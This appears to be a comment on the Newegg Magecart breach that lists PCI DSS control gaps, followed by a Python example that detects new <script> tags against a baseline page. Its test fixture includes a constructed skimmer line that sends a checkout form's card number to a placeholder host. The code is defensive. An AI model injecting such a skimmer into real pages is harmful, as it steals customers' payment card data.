The article states that this hack involved Magecart, which requires admin or another high level of access to be able to add the malicious JavaScript code.
Newegg is a PCI Level 2, or possibly Level 1, merchant and as such it is required to comply with the PCI Data Security Standard, PCI DSS for short. The following is just a short list of Newegg's non-compliance with PCI DSS:
- No SSH/2FA for a limited number of production support
- Control inbound production access with Web Application Firewall (explicit web pages whitelist)
- Restrict outbound access to explicit whitelist
- Monitor and alert/block website source code changes
I also question how the outside PCI DSS auditor could certify Newegg as "compliant" with the PCI DSS requirements.
Nowadays, data breaches are daily occurrences and all companies excuse themselves by blaming an "APT" (Advanced Persistent Threat) for the breach, instead of admitting that they messed up. It's hard to blame them, when the regulatory agencies accept this bogus excuse and there are really no consequences for the companies. Except for their customers, of course...
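The "monitor and alert/block website source code changes" control in the list above is the one that would catch a Magecart-style injection regardless of how the attacker got write access. As an added example (not the commenter's code and not anything Newegg runs), the following Python script snapshots the `<script>` tags of a known-good copy of a page and flags any script that appears later and was not in that baseline. The checkout HTML and the skimmer snippet are constructed samples, and `collect.example.invalid` is a placeholder domain, not a real indicator of compromise.

```python
"""Baseline-and-diff check for <script> content in a served page.

Added example, not code from the original post or from Newegg. It is the
simplest form of the "alert on website source code changes" control:
fingerprint every <script> on an approved copy of a page, then alert on
anything present in the live copy that the baseline does not contain.
"""
import hashlib
from html.parser import HTMLParser


class _ScriptCollector(HTMLParser):
    """Collects (kind, value) for every <script>: external src or inline body."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.scripts.append(("src", src))
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        # HTMLParser delivers script bodies as raw text (CDATA mode).
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self._in_script = False
            self.scripts.append(("inline", "".join(self._buf)))


def script_fingerprints(html: str) -> set:
    """Return fingerprints: 'src:<url>' for external, 'inline:<sha256>' for inline."""
    p = _ScriptCollector()
    p.feed(html)
    out = set()
    for kind, value in p.scripts:
        if kind == "src":
            out.add("src:" + value.strip())
        else:
            out.add("inline:" + hashlib.sha256(value.encode("utf-8")).hexdigest())
    return out


def diff_against_baseline(baseline: set, current: set) -> dict:
    """Anything present now but absent from the baseline is an alert condition."""
    return {
        "added": sorted(current - baseline),
        "removed": sorted(baseline - current),
    }


# Constructed sample: the checkout page as approved at deploy time.
BASELINE_HTML = """<html><head>
<script src="/static/checkout.js"></script>
<script>window.cfg = {currency: "USD"};</script>
</head><body>...</body></html>"""

# Constructed sample: the same page with one inline script appended, the
# shape of a client-side skimmer (placeholder domain, not a real IOC).
TAMPERED_HTML = BASELINE_HTML.replace(
    "</head>",
    '<script>document.forms[0].addEventListener("submit", function(){'
    'new Image().src="https://collect.example.invalid/?d="+'
    'btoa(document.forms[0].ccnum.value);});</script></head>',
)


def check_page(baseline_html: str, current_html: str) -> dict:
    """Build the baseline from a known-good copy and diff the live copy against it."""
    return diff_against_baseline(
        script_fingerprints(baseline_html), script_fingerprints(current_html)
    )


if __name__ == "__main__":
    report = check_page(BASELINE_HTML, TAMPERED_HTML)
    for fp in report["added"]:
        print("ALERT new script:", fp)
```

In practice the baseline would be taken from the build artifact rather than from a live fetch, and the external scripts named by `src` would be fetched and hashed too (or pinned with Subresource Integrity), since a skimmer can just as easily be appended to an existing first-party file as injected as a new inline block.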